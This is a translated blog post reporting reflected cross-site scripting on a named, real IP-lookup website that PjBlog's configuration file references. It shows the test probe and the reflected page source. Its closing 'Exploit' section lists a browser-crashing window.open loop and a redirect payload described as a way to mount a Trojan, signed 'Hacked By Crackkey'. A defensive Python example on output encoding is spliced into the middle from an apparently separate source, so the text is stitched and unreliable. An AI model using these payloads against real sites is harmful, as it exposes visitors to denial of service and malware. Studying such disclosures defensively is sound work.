EcAngel ecangel.blogbus.com
Look, this title is very attractive. In fact, PjBlog does not have a cross-site vulnerability, and it has never been tested for one; even if one exists, we haven't found it yet. But there is a key point, so let's take the next step. Don't worry.
Because of Meister's influence I used to use PjBlog to write my blog, so I occasionally flip through its source code.
The database connection PjBlog defines is in const.asp. Most PjBlog users modify the default database path, and I am no exception. I don't know how many times this file has been leaked. Out of curiosity I found a piece of sensitive information: at line 18 of const.asp there is a Web site used for IP address queries:
Const CookieName = "PJBlog2"
Const CookieNameSetting = "PJBlog2Setting"
Const IPViewURL = "http://www.dheart.net/ip/index.php?ip="  'IP address query URL
Response.Cookies(CookieNameSetting).Expires = Date + 365
I opened the home page of this IP query website, URL: http://www.dheart.net
After looking around, I found that this female webmaster is very good at ASP and PHP, and there is a dedicated technical discussion page on her personal website. The entire site is written in PHP.
From the homepage, open the "IP address query" page, URL: http://www.dheart.net/ip/
Enter <script>alert(EcAngel)</script> in the query input box to test the code.
The result pops up three times in a row. Viewing the page source shows what the page produced after the data was submitted:
<center>
Query Result<br><script>alert(EcAngel)</script><br>the IP address is invalid!<p align="center"><font size="2" color="#999999">the above data is for reference only</font></p>
<center><table border="0" align="center">
<tr><td rowspan="2" width="28"></td><td width="228">
<a href="http://www.baidu.com?tn=lphy_pg&cl=3&f=5&word=<script>alert(EcAngel)</script>" target="_blank" style="text-decoration:none;"><font style="font-size:12px;color:000000"><b>Baidu</b>&nbsp;<script>alert(EcAngel)</script> related content</font></a>
</td></tr><td>
<a href="http://www.google.com/custom?q=<script>alert(EcAngel)</script>&sa=%CB%D1%CB%F7&client=pub-5982123305735309&forid=1&ie=GB2312&oe=GB2312&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3a3%99%3BALC%3a%ff%3BLC%3a%ff%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A1%3B&hl=zh-CN" target="_blank" style="text-decoration:none;"><font style="font-size:12px;color:000000"><b>Google</b>&nbsp;<script>alert(EcAngel)</script> related content</font></a>
</td></tr></table></center>
After the scripts run, the page changes again and shows the Baidu and Google "related content" links, but they return no results.
Because Baidu and Google both filter the data submitted to them, the reflections inside those links cannot be exploited cross-site;
the test results extracted from the code above confirm this. After thorough testing, only the IP address query itself has a cross-site vulnerability.
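The page source above shows the submitted value reflected verbatim in three different contexts: the body text, the `href` of a link, and the link text. The following Python is an added example (not code from the post or from the dheart.net site) that mimics the vulnerable rendering, shows the hardened version with the context-appropriate encoding for each spot, and includes the defender-side check a tester would run: whether the probe string comes back exactly as sent. The IP check, the page layout and the `render_result_*` / `count_reflections` names are assumptions for the demonstration.

```python
import html
import ipaddress
from urllib.parse import quote

# Constructed probe, the same harmless marker the post typed into the query box.
PROBE = "<script>alert(EcAngel)</script>"


def _lookup_status(query: str) -> str:
    """Reject anything that is not a literal IP before any lookup happens."""
    try:
        ipaddress.ip_address(query)
        return "lookup would run here"
    except ValueError:
        return "the IP address is invalid!"


def render_result_vulnerable(query: str) -> str:
    """Behaviour the post observed: the raw value is pasted into the HTML
    in three places (text node, href attribute, link text), so any markup
    in it becomes live markup."""
    status = _lookup_status(query)
    return (
        f"<center>Query Result<br>{query}<br>{status}"
        f'<a href="http://www.baidu.com?word={query}">Baidu {query} related content</a>'
        "</center>"
    )


def render_result_hardened(query: str) -> str:
    """Same page, with each reflection encoded for the context it lands in:
    HTML-escaped for text nodes, URL-encoded for the query-string value."""
    status = _lookup_status(query)
    safe_text = html.escape(query, quote=True)   # & < > " ' become entities
    safe_param = quote(query, safe="")           # percent-encode for the URL
    return (
        f"<center>Query Result<br>{safe_text}<br>{status}"
        f'<a href="http://www.baidu.com?word={safe_param}">Baidu {safe_text} related content</a>'
        "</center>"
    )


def count_reflections(body: str, probe: str = PROBE) -> int:
    """Defender-side check: how many times does the probe appear in the
    response exactly as it was sent? Any count above zero means the page
    is echoing input unencoded in at least one context."""
    return body.count(probe)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_result_vulnerable),
                         ("hardened", render_result_hardened)):
        body = render(PROBE)
        print(f"{name}: {count_reflections(body)} unencoded reflection(s)")
        print(body)
```

Note that validating the input as an IP address (`_lookup_status`) does not by itself stop the reflection, because the page still echoes the rejected value back in its "invalid" message; the output encoding in `render_result_hardened` is what removes all three reflections, and it does so regardless of what the lookup decides.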
Exploit
One: <script>while(1){window.open();}</script> endless loop of IE windows
Two: <script>location.href="http://www.google.com";</script> mount a Trojan on the redirected page
Hacked By Crackkey